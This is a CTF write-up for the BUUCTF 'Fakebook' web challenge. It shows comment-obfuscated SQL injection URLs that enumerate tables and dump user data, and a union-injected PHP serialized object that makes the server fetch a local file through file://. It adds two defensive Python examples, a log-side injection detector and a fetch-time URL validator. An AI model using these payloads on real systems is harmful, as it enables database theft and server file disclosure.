BUUCTF WEB Fakebook
Opening the login page, I found it also has registration!
Register an account and log in:
There is a parameter in the URL, and what is displayed below should be the URL of your blog!
Where there is a parameter, SQL injection is worth a try! It turns out to be blind injection: no=1 and 1=1 and no=1 and 1=0 return different pages!
But error-based injection also seems to work! There are four columns!
Later I found that spaces are filtered; replacing them with /**/ works, which confirms the injection:
Try the injection:
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3,4#
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=%27users%27),3,4#
Column names of the users table:
Look at the contents:
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,(select/**/group_concat(data)/**/from/**/users),3,4#
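The filter in this challenge removes literal spaces, and the writeup bypasses it with /**/ comments. A log-side detector has to undo exactly that before matching, which is what the following added example does (this is not part of the original writeup; the access-log lines are constructed, and the four detection labels are my own naming): it URL-decodes each query parameter, replaces MySQL inline comments with whitespace, and then looks for union/select, information_schema access, boolean tautologies such as "and 1=1", and load_file().

```python
"""Log-side detection of comment-obfuscated SQL injection in query strings.

Constructed sample access-log lines (common log format) stand in for a real log.
"""
import re
from urllib.parse import urlsplit, unquote

# Constructed sample: a normal request, a boolean probe, a union/information_schema
# request using /**/ in place of spaces, and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /view.php?no=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:07 +0000] "GET /view.php?no=1%20and%201=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:12 +0000] "GET /view.php?no=0/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3,4%23 HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2020:10:00:30 +0000] "GET /user.php?no=2 HTTP/1.1" 200 498
"""

# Client address plus the request target out of the quoted request line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Patterns applied to the normalised (decoded, comment-stripped) parameter value.
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-enumeration": re.compile(r"\binformation_schema\s*\.", re.I),
    "boolean-tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "file-read": re.compile(r"\bload_file\s*\(", re.I),
}


def normalise(value: str) -> str:
    """URL-decode (twice, to cover double encoding), turn /*...*/ comments into
    spaces and collapse whitespace runs, so that 0/**/union/**/select reads as
    '0 union select'."""
    decoded = unquote(unquote(value))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", decoded).strip()


def query_params(target: str) -> list:
    """Split the query string by hand so the raw (still encoded) value is kept
    for normalise(); parse_qsl would decode it and, on older Pythons, split on ';'."""
    params = []
    for pair in urlsplit(target).query.split("&"):
        if pair:
            name, _, raw = pair.partition("=")
            params.append((unquote(name), raw))
    return params


def classify(raw_value: str) -> list:
    """Return the labels of every pattern that matches the normalised value."""
    text = normalise(raw_value)
    return [label for label, rx in SQLI_PATTERNS.items() if rx.search(text)]


def scan_log(log_text: str) -> list:
    """One finding per (request, parameter) whose value matches at least one pattern."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for name, raw in query_params(m["target"]):
            reasons = classify(raw)
            if reasons:
                findings.append({"ip": m["ip"], "param": name,
                                 "reasons": reasons, "normalised": normalise(raw)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["param"], f["reasons"], f["normalised"])
```

The point of normalising before matching is that the comment trick only defeats filters that look for literal spaces; once /**/ is treated as whitespace the injected statement is ordinary SQL again, and the same normalisation belongs in the application-side filter, or better, the parameter should go through a prepared statement so no filter is needed.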
The stored value looks like a serialized object?
In fact it was already shown on an error page earlier:
Looking closely at the serialized string, it holds the values we entered at registration. But how do we make use of it?
I suspected that it fetches the blog contents and displays them on his/her blog page, but we do not know where the flag is in the contents.
After some attempts I found the flag.php page, so we can read the file's contents through the file protocol.
We construct a new serialized string:
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
When the SQL query asks for a no that does not exist, it does not raise an error, so inject it directly:
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:5:%22admin%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27#
Result:
Click in and view the page source to get the flag:
Actually this challenge also has a robots.txt, and there is a backup file:
<?php
// Backup of the challenge source recovered via robots.txt (comments added for this writeup).
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    // Fetches $url with curl. Nothing here restricts the URL scheme, so whatever
    // scheme the stored blog value carries is the scheme curl will use.
    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    // Accepts only http(s) URLs or bare host names. Registration is rejected by this
    // check (see below); a value written to the database by other means never goes through it.
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
Looking at this function, it should read the contents of a URL! So could we write the file path directly when registering?
Hmm, it seems not:
It should be the isValidBlog() function! So we can only obtain the contents of flag.php through the SQL statement.
I saw a more brute-force approach from an expert, reading the contents of flag.php directly with the SQL statement:
I did not expect load_file() to be usable here.
This should be an unintended solution, right? Learn from it!
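The two halves of the writeup fit together here: the serialized UserInfo string built earlier is accepted because isValidBlog() is only consulted at registration, while the object rebuilt from the database value is handed to get() unchecked. The following added example (not from the writeup or the challenge; the parser, the BENIGN record and the load_profile gate are mine) decodes a stored record in the same O/s/i serialization format the page shows and re-applies the blog check at fetch time, with an explicit http/https scheme allowlist and a class-name check standing in for PHP's unserialize() allowed_classes option. Only the three serialization types that appear on the page are handled, and the parser assumes ASCII input because PHP string lengths are byte counts.

```python
"""Parse a PHP-serialized UserInfo record and re-validate its blog field before fetching."""
import re
from urllib.parse import urlsplit

# Serialized string from the writeup (file:// blog) and a constructed benign record.
PAYLOAD = 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
BENIGN = 'O:8:"UserInfo":3:{s:4:"name";s:5:"alice";s:3:"age";i:30;s:4:"blog";s:24:"https://blog.example.com";}'

# The challenge's isValidBlog() pattern, translated to Python.
BLOG_RE = re.compile(r"^((https?://)?)([0-9a-zA-Z-]+\.)+[a-zA-Z]{2,6}(:[0-9]+)?(/\S*)?$", re.I)
ALLOWED_SCHEMES = {"http", "https"}
EXPECTED_CLASS = "UserInfo"


def _parse(s: str, i: int):
    """Return (value, next_index) for the serialized value starting at s[i]."""
    t = s[i]
    if t == "i":                                  # i:123;
        end = s.index(";", i)
        return int(s[i + 2:end]), end + 1
    if t == "s":                                  # s:4:"name";
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2                         # skip ':"'
        value = s[start:start + length]
        if s[start + length:start + length + 2] != '";':
            raise ValueError("string length does not match payload at %d" % i)
        return value, start + length + 2
    if t == "O":                                  # O:8:"UserInfo":3:{...}
        colon = s.index(":", i + 2)
        name_len = int(s[i + 2:colon])
        name = s[colon + 2:colon + 2 + name_len]
        j = colon + 2 + name_len + 2              # skip '":'
        colon2 = s.index(":", j)
        count = int(s[j:colon2])
        j = colon2 + 2                            # skip ':{'
        props = {"__class": name}
        for _ in range(count):
            key, j = _parse(s, j)
            val, j = _parse(s, j)
            props[key] = val
        if s[j] != "}":
            raise ValueError("object not terminated at %d" % j)
        return props, j + 1
    raise ValueError("unsupported serialization type %r at %d" % (t, i))


def parse_php_serialized(data: str):
    """Decode one complete serialized value; reject trailing garbage."""
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def is_valid_blog(blog: str) -> bool:
    """Same acceptance as the PHP isValidBlog(): http(s) URLs or bare host names only."""
    return BLOG_RE.match(blog) is not None


def fetch_allowed(blog: str) -> bool:
    """Fetch-time gate: the registration regex again plus an explicit scheme allowlist,
    so a value that reached the database without passing isValidBlog() is still stopped."""
    if not is_valid_blog(blog):
        return False
    url = blog if "://" in blog else "http://" + blog
    return urlsplit(url).scheme.lower() in ALLOWED_SCHEMES


def load_profile(serialized: str) -> dict:
    """Decode a stored record and decide whether its blog may be fetched at all."""
    obj = parse_php_serialized(serialized)
    if obj.get("__class") != EXPECTED_CLASS:      # stand-in for unserialize() allowed_classes
        raise ValueError("unexpected class %r" % obj.get("__class"))
    return {"name": obj["name"], "age": obj["age"], "blog": obj["blog"],
            "fetch_allowed": fetch_allowed(obj["blog"])}


if __name__ == "__main__":
    for record in (PAYLOAD, BENIGN):
        print(load_profile(record))
```

Moving the check next to the fetch, rather than trusting that every row came through the registration form, is what closes the gap the writeup exploits: the file:// record still parses, but fetch_allowed is False, so getBlogContents() would never be reached for it.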